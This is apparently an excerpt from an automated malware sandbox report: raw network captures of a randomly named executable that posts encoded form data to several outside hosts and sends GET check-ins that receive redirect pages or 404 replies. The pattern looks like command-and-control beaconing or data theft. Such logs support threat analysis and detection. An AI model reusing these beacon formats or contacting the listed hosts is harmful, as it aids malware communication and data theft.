                                                    Data Raw: 4c 34 4d 6c 3d 49 59 54 59 32 4c 59 6a 45 45 78 2f 6a 54 38 55 61 31 38 70 4e 6b 62 71 61 51 7a 7a 37 2f 2f 58 50 31 57 4e 65 32 67 49 63 6f 30 51 78 4d 4f 5a 4f 44 66 66 48 76 37 4f 58 73 4d 35 6a 4a 43 69 54 4d 6d 71 30 32 42 32 4e 36 49 6c 2f 5a 32 41 53 4c 76 50 44 59 74 6b 54 78 77 47 50 2b 2b 49 77 7a 65 36 4b 75 69 51 48 58 52 57 7a 66 33 6c 62 66 32 68 2f 58 70 4a 51 4d 34 46 44 70 78 50 6b 48 69 6e 58 73 4d 44 2b 46 77 31 51 6f 36 65 5a 48 4d 46 33 75 33 6f 4e 56 41 7a 6b 79 37 64 4a 68 52 43 58 63 44 48 32 55 4d 62 7a 61 6b 71 48 74 6e 72 4f 44 65 72 73 75 63 6c 32 6c 48 69 78 46 55 36 6b 4f 33 79 5a 31 68 38 30 6a 71 2b 33 46 44 52 77 70 4c 6e 70 6c 38 4d
                                                    Data Ascii: L4Ml=IYTY2LYjEEx/jT8Ua18pNkbqaQzz7//XP1WNe2gIco0QxMOZODffHv7OXsM5jJCiTMmq02B2N6Il/Z2ASLvPDYtkTxwGP++Iwze6KuiQHXRWzf3lbf2h/XpJQM4FDpxPkHinXsMD+Fw1Qo6eZHMF3u3oNVAzky7dJhRCXcDH2UMbzakqHtnrODersucl2lHixFU6kO3yZ1h80jq+3FDRwpLnpl8M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.8637193.33.130.190806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:19:00.932589054 CEST1765OUTPOST /i5ct/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.airtech365.net
                                                    Origin: http://www.airtech365.net
                                                    Referer: http://www.airtech365.net/i5ct/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 49 59 54 59 32 4c 59 6a 45 45 78 2f 6a 54 38 55 61 31 38 70 4e 6b 62 71 61 51 7a 7a 37 2f 2f 58 50 31 57 4e 65 32 67 49 63 6f 4d 51 74 70 53 5a 50 67 33 66 56 2f 37 4f 4c 63 4d 34 6a 4a 43 37 54 4b 50 6a 30 32 63 44 4e 34 67 6c 2b 34 57 41 55 35 48 50 4a 59 74 6b 52 78 77 44 4c 2b 2f 43 77 33 7a 39 4b 74 4b 51 48 58 52 57 7a 64 2f 6c 63 4e 65 68 39 58 70 4f 58 4d 34 7a 48 70 78 72 6b 45 53 5a 58 73 49 31 39 31 51 31 58 4d 61 65 59 31 6b 46 2b 75 33 71 41 31 41 37 6b 79 33 72 4a 68 64 34 58 63 33 39 32 55 6b 62 78 75 4d 77 41 63 53 79 55 67 57 6e 72 75 63 61 35 46 33 6a 7a 57 77 38 72 4f 6e 33 66 77 35 4d 7a 69 65 4b 32 56 4b 32 6e 49 43 32 6d 79 46 69 54 32 7a 67 55 33 55 63 45 48 48 2b 55 63 63 39 56 38 78 59 44 2f 62 58 4c 2b 36 6a 73 44 4f 69 56 45 58 32 41 46 59 50 4e 4c 44 6c 32 37 4f 4f 4d 42 31 6b 6c 73 77 54 79 4c 64 43 4d 35 64 66 79 4e 76 64 54 4d 55 79 62 61 46 66 38 4d 41 49 35 57 71 4d 79 6c 49 55 70 62 79 38 56 4c 45 45 4b 61 5a 4c 64 67 67 79 6c 38 48 75 50 46 68 71 52 [TRUNCATED]
                                                    Data Ascii: L4Ml=IYTY2LYjEEx/jT8Ua18pNkbqaQzz7//XP1WNe2gIcoMQtpSZPg3fV/7OLcM4jJC7TKPj02cDN4gl+4WAU5HPJYtkRxwDL+/Cw3z9KtKQHXRWzd/lcNeh9XpOXM4zHpxrkESZXsI191Q1XMaeY1kF+u3qA1A7ky3rJhd4Xc392UkbxuMwAcSyUgWnruca5F3jzWw8rOn3fw5MzieK2VK2nIC2myFiT2zgU3UcEHH+Ucc9V8xYD/bXL+6jsDOiVEX2AFYPNLDl27OOMB1klswTyLdCM5dfyNvdTMUybaFf8MAI5WqMylIUpby8VLEEKaZLdggyl8HuPFhqRZcSIKRcAhTX8EGUg9a4qi3Sm1h6Spo9PZhySnaoDMtsIDsE/M1Lqcqq8YDKYhE4jV61kVc61/DoZPkhC4Uc47i/SiahQ7MYyH4zaRrSBLpciw4OP2NtBdgvbeB0wrGBJ0wrdPmXPIGvyJjOdjI+d/3ZeeXkAsaVSXpqkv2eDMJKAqEcOp1myCDNOvyMx9ffHY5JjYOyFe0WIzFYBrC2ZxRyHrwlHVMAsd3uauioMUS3fpi1Ml9lfwVlf2ipiB7yTRSHAj9hGQbjBZK1Ra2j0eGtbz8YB508vCSNz42tl4xwo8AIiqY5WagLKlduuYhRSUoK/83Ok6gXyFLwl/MgqmH/W95ec11mkzW+eus6zmJxdmttnoiPglBKNiL+oyfq81DQF9gTQv3I9cxl3TcEyOgxShXICOcVuB1njBb4jJnbPC1cgQvw28WuVOUk8uJgPRKL+1Tjq2wKiDPXR0T+pub6roRAb9nu3nDiRKyhciKIVJSQWQrYOdDOFnHc67nqN7Jxfcd0InDepuEKUTNdjmyqOliyCUrp4Mk+p1jzEYL45IJ55BuoEhzLGRY8jBKllDgrbiwX1yaJp3X/pY5NvhS1spBTxNpbCu6OGl9piIhH86Ws18n5JBWG6+nyX1yyl69Y0X7zPEDuA/Krs5UyIK5JPUOnt2ZH55M [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.8637203.33.130.190806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:19:03.475888968 CEST461OUTGET /i5ct/?L4Ml=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.airtech365.net
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:19:03.958303928 CEST401INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Tue, 24 Sep 2024 15:19:03 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 261
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4c 34 4d 6c 3d 46 61 37 34 31 39 38 37 41 57 49 34 6d 6c 38 4a 62 79 6b 67 4a 68 4c 6c 64 52 53 56 38 4d 4c 4d 43 6c 71 36 59 58 30 62 43 72 6b 55 2b 4a 61 6f 50 7a 71 6a 44 75 66 36 49 63 6c 65 39 61 61 75 54 37 4c 77 36 6e 64 6c 62 49 45 7a 39 72 47 74 58 34 32 71 49 5a 78 39 57 78 59 50 48 73 79 2b 37 54 79 4f 5a 76 37 6a 4f 45 6c 4c 74 75 65 58 64 74 66 72 6a 45 4a 52 64 59 38 53 63 74 4d 46 2f 67 3d 3d 26 56 58 3d 58 5a 47 78 2d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?L4Ml=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g==&VX=XZGx-"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.86372152.223.13.41806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:19:17.435568094 CEST746OUTPOST /8q1d/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.longfilsalphonse.net
                                                    Origin: http://www.longfilsalphonse.net
                                                    Referer: http://www.longfilsalphonse.net/8q1d/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 59 78 4d 32 62 6e 73 54 61 43 43 56 43 75 7a 56 6a 58 6c 32 61 31 61 70 62 51 42 45 37 64 56 2f 56 54 42 33 69 59 58 48 4c 53 70 30 54 2b 68 77 52 4a 4f 2f 35 35 4c 74 58 6c 51 62 6c 2f 6b 4e 6d 47 74 4c 39 49 31 79 6f 41 31 46 62 42 2b 2f 30 31 4b 39 32 33 30 2b 64 4c 35 75 6b 37 54 6a 6d 6f 51 47 45 53 39 73 35 79 7a 4a 6e 6f 62 36 55 61 64 6d 70 32 64 6a 32 53 75 59 38 35 59 45 59 36 73 47 30 68 69 57 4d 52 58 6d 44 41 53 4d 73 57 43 72 6c 6d 35 34 6a 52 76 71 4a 46 38 54 4c 32 39 74 32 56 6e 6c 76 43 76 78 35 6f 36 46 5a 55 75 57 4d 33 6c 42 30 74 43 72 48 72 37 31 49 30 51 67 79 38 55 3d
                                                    Data Ascii: L4Ml=YxM2bnsTaCCVCuzVjXl2a1apbQBE7dV/VTB3iYXHLSp0T+hwRJO/55LtXlQbl/kNmGtL9I1yoA1FbB+/01K9230+dL5uk7TjmoQGES9s5yzJnob6Uadmp2dj2SuY85YEY6sG0hiWMRXmDASMsWCrlm54jRvqJF8TL29t2VnlvCvx5o6FZUuWM3lB0tCrHr71I0Qgy8U=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.86372252.223.13.41806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:19:19.983783960 CEST766OUTPOST /8q1d/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.longfilsalphonse.net
                                                    Origin: http://www.longfilsalphonse.net
                                                    Referer: http://www.longfilsalphonse.net/8q1d/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 59 78 4d 32 62 6e 73 54 61 43 43 56 51 66 44 56 68 30 4e 32 66 56 61 71 65 51 42 45 78 39 55 30 56 54 4e 33 69 5a 53 61 4c 6b 42 30 54 66 52 77 65 6f 4f 2f 2b 35 4c 74 63 46 51 65 6f 66 6b 45 6d 47 6f 32 39 4a 5a 79 6f 41 78 46 62 46 79 2f 30 47 69 2b 30 6e 30 38 57 72 35 6f 35 4c 54 6a 6d 6f 51 47 45 53 70 43 35 79 62 4a 6e 5a 72 36 47 37 64 70 6a 57 64 69 78 53 75 59 34 35 59 49 59 36 73 65 30 67 4f 6f 4d 58 54 6d 44 43 61 4d 6f 54 2b 73 72 6d 35 69 6e 52 75 65 4a 51 68 74 52 52 74 44 79 57 44 64 75 6a 62 49 31 2b 58 76 44 32 6d 51 50 33 4e 71 30 75 71 64 43 63 6d 64 53 58 41 51 73 72 42 44 2f 31 31 74 46 6f 6b 6f 6c 6e 38 51 4d 4c 4e 75 4d 53 53 35
                                                    Data Ascii: L4Ml=YxM2bnsTaCCVQfDVh0N2fVaqeQBEx9U0VTN3iZSaLkB0TfRweoO/+5LtcFQeofkEmGo29JZyoAxFbFy/0Gi+0n08Wr5o5LTjmoQGESpC5ybJnZr6G7dpjWdixSuY45YIY6se0gOoMXTmDCaMoT+srm5inRueJQhtRRtDyWDdujbI1+XvD2mQP3Nq0uqdCcmdSXAQsrBD/11tFokoln8QMLNuMSS5


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.86372352.223.13.41806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:19:22.622394085 CEST1783OUTPOST /8q1d/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.longfilsalphonse.net
                                                    Origin: http://www.longfilsalphonse.net
                                                    Referer: http://www.longfilsalphonse.net/8q1d/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 59 78 4d 32 62 6e 73 54 61 43 43 56 51 66 44 56 68 30 4e 32 66 56 61 71 65 51 42 45 78 39 55 30 56 54 4e 33 69 5a 53 61 4c 6b 4a 30 54 74 70 77 52 76 53 2f 2f 35 4c 74 66 46 51 66 6f 66 6c 47 6d 47 51 79 39 4a 46 69 6f 43 35 46 62 67 75 2f 39 58 69 2b 2b 6e 30 38 5a 4c 35 74 6b 37 54 32 6d 75 77 43 45 53 35 43 35 79 62 4a 6e 61 44 36 51 61 64 70 77 47 64 6a 32 53 75 55 38 35 5a 56 59 36 30 6b 30 67 36 34 4d 6b 62 6d 44 68 79 4d 75 31 71 73 6a 6d 35 6b 71 78 75 47 4a 51 6c 49 52 56 4e 31 79 58 6e 37 75 6b 76 49 77 49 32 32 5a 6e 69 4b 55 56 56 48 74 38 69 63 44 4f 61 4e 59 55 68 68 73 34 6c 56 70 43 41 47 41 6f 6f 2b 69 6e 68 50 4f 73 42 64 42 6d 7a 6b 54 4f 2f 51 49 35 66 57 78 63 6b 68 69 67 59 39 52 68 76 4a 78 50 63 66 78 52 33 66 71 4e 51 57 4a 37 6b 6a 2b 71 31 37 74 37 66 73 71 56 4d 76 6b 35 56 41 55 64 58 34 51 51 42 50 54 41 42 55 44 7a 62 6f 67 30 75 38 2b 2f 54 6f 6e 45 57 33 47 79 70 71 32 7a 61 38 73 66 30 6d 2b 49 56 2b 56 59 71 34 64 4b 6d 39 4e 4f 70 44 61 6c 49 37 74 [TRUNCATED]
                                                    Data Ascii: L4Ml=YxM2bnsTaCCVQfDVh0N2fVaqeQBEx9U0VTN3iZSaLkJ0TtpwRvS//5LtfFQfoflGmGQy9JFioC5Fbgu/9Xi++n08ZL5tk7T2muwCES5C5ybJnaD6QadpwGdj2SuU85ZVY60k0g64MkbmDhyMu1qsjm5kqxuGJQlIRVN1yXn7ukvIwI22ZniKUVVHt8icDOaNYUhhs4lVpCAGAoo+inhPOsBdBmzkTO/QI5fWxckhigY9RhvJxPcfxR3fqNQWJ7kj+q17t7fsqVMvk5VAUdX4QQBPTABUDzbog0u8+/TonEW3Gypq2za8sf0m+IV+VYq4dKm9NOpDalI7t0ViA7IHBQ2q9hrP14zps65SSCbUxaS/L66Uw8mV0D2DfbSzIJPBc9y0gAnFf0FcbdcG+Pg2bjEogwxhKtD1733R0Tvf/0sWPfkLyAq9D7ZFpuzb4WGiuYNYWjCPIGw3luNn4S9tjQkMtY1Xe/787a0pAUdmC0nBDuxoTcrkrPWD9tZYt2C9U2zkFarnoVMwShLTdvHRL7Gk/RmnnCfonVV0JVtVUFlYYueB6Q9ohGz2RnvvQsO9ujOGB2a6k/XS8WiPgQY3stzhbRMIom9lQoq6daCC7gYuomP/CxFGApH1xeA8alAa6E1TUWjRQ4bRiVcQWTnFz+EBNRRj4ZpiXph3P9/G+ld7mK2dUUIbgN7H1i501LtPByqBNKSBgoEeKAN173biwzb1Eb49smiIiu2x5l33YT2xK0nLwneowrqBto33ED3op4L9HFQ91VY6PMt0pEBVVyxCiL2xFb+PywEamx+wKX2+LhNQ3F8nq/1chhU+lc5Kl8zR+IMcTqwwEaA1bZA0G3MxX85u+ZZde10TkkiVKfX9WQ8ewontYN9zgG1x4GxMxUIyrqKIM7PZuQbopNeY/wOEtHvanybYsu7Ieb0aYOmvM0chdVbBVDiWZBd2uwBdyEco/oISMMY0Lu/qeaFc1nUF2fWoBHh3Ri/BEaHj7I6Wsne [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.86372452.223.13.41806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:19:25.270358086 CEST467OUTGET /8q1d/?L4Ml=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.longfilsalphonse.net
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:19:25.918009996 CEST401INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Tue, 24 Sep 2024 15:19:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 261
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4c 34 4d 6c 3d 56 7a 6b 57 59 51 49 71 5a 43 71 79 54 61 36 43 6d 43 46 58 61 33 71 6f 59 77 55 44 34 73 31 66 66 53 70 70 67 4a 72 74 56 43 46 30 53 4e 70 51 59 72 48 41 2b 76 62 39 56 30 68 73 72 65 70 74 76 52 30 61 72 71 35 48 6d 77 52 69 5a 44 75 4c 32 45 62 66 78 6e 73 62 51 37 64 44 39 61 44 6c 71 34 6f 51 64 54 64 4d 32 51 6a 32 67 36 61 30 62 70 45 57 77 57 49 42 37 78 36 4a 6c 64 51 4e 4d 51 3d 3d 26 56 58 3d 58 5a 47 78 2d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?L4Ml=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ==&VX=XZGx-"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.86372538.47.232.144806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:19:31.424901962 CEST713OUTPOST /wqu9/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yu35n.top
                                                    Origin: http://www.yu35n.top
                                                    Referer: http://www.yu35n.top/wqu9/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 51 42 53 6a 73 67 57 76 52 4e 34 35 6b 30 6b 75 31 6e 70 6c 6b 76 75 4b 72 4e 52 4a 73 33 38 64 36 69 67 5a 6e 76 2b 58 65 56 4b 4f 32 4a 70 71 2f 57 4f 71 4b 4a 74 63 6e 4c 6c 32 43 43 78 6f 66 6f 71 45 48 37 2b 79 75 50 45 48 5a 4f 71 30 43 62 57 67 4a 70 44 56 33 4d 4d 51 4c 53 63 6c 73 42 4b 31 35 57 43 32 6c 55 38 72 77 62 37 39 42 51 6e 43 4a 64 42 54 5a 4a 58 5a 72 65 43 65 4e 4b 72 50 46 66 68 42 66 42 41 79 70 6f 4c 65 68 72 31 4d 5a 61 76 78 76 36 2b 46 76 70 72 61 73 68 4c 6a 67 68 69 6c 34 59 59 67 45 63 65 47 31 69 6d 6a 54 45 71 45 4a 34 6a 41 56 30 57 2f 2f 54 69 6c 6c 51 55 3d
                                                    Data Ascii: L4Ml=QBSjsgWvRN45k0ku1nplkvuKrNRJs38d6igZnv+XeVKO2Jpq/WOqKJtcnLl2CCxofoqEH7+yuPEHZOq0CbWgJpDV3MMQLSclsBK15WC2lU8rwb79BQnCJdBTZJXZreCeNKrPFfhBfBAypoLehr1MZavxv6+FvprashLjghil4YYgEceG1imjTEqEJ4jAV0W//TillQU=
                                                    Sep 24, 2024 17:19:32.421530962 CEST312INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Tue, 24 Sep 2024 15:19:32 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66ea4ae9-94"
                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.86372638.47.232.144806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:19:33.994790077 CEST733OUTPOST /wqu9/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yu35n.top
                                                    Origin: http://www.yu35n.top
                                                    Referer: http://www.yu35n.top/wqu9/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 51 42 53 6a 73 67 57 76 52 4e 34 35 31 6b 30 75 36 67 46 6c 7a 66 75 4a 6e 74 52 4a 6e 58 38 5a 36 69 73 5a 6e 71 47 35 65 67 53 4f 31 72 78 71 38 58 4f 71 4a 4a 74 63 76 72 6c 33 4e 69 78 5a 66 6f 6d 32 48 37 43 79 75 4f 67 48 5a 4d 69 30 43 4d 4b 6e 50 35 44 58 38 73 4d 57 50 53 63 6c 73 42 4b 31 35 57 48 6a 6c 51 59 72 78 72 72 39 41 31 4c 42 44 39 42 51 4a 35 58 5a 6d 2b 43 61 4e 4b 71 61 46 65 4e 6e 66 44 34 79 70 73 44 65 68 2b 42 4e 53 61 76 4e 6a 71 2f 73 6e 4a 61 79 75 58 6d 4e 69 77 32 2b 34 4b 64 45 46 71 7a 73 76 41 75 6c 51 45 43 76 4a 37 4c 32 51 44 4c 58 6c 77 79 56 37 48 41 46 58 6a 33 4b 51 66 49 59 47 47 75 4f 47 41 79 53 70 33 50 56
                                                    Data Ascii: L4Ml=QBSjsgWvRN451k0u6gFlzfuJntRJnX8Z6isZnqG5egSO1rxq8XOqJJtcvrl3NixZfom2H7CyuOgHZMi0CMKnP5DX8sMWPSclsBK15WHjlQYrxrr9A1LBD9BQJ5XZm+CaNKqaFeNnfD4ypsDeh+BNSavNjq/snJayuXmNiw2+4KdEFqzsvAulQECvJ7L2QDLXlwyV7HAFXj3KQfIYGGuOGAySp3PV
                                                    Sep 24, 2024 17:19:34.938363075 CEST312INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Tue, 24 Sep 2024 15:19:34 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66ea4ae9-94"
                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    35192.168.2.86372738.47.232.14480
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:19:36.974090099 CEST1750OUTPOST /wqu9/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yu35n.top
                                                    Origin: http://www.yu35n.top
                                                    Referer: http://www.yu35n.top/wqu9/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
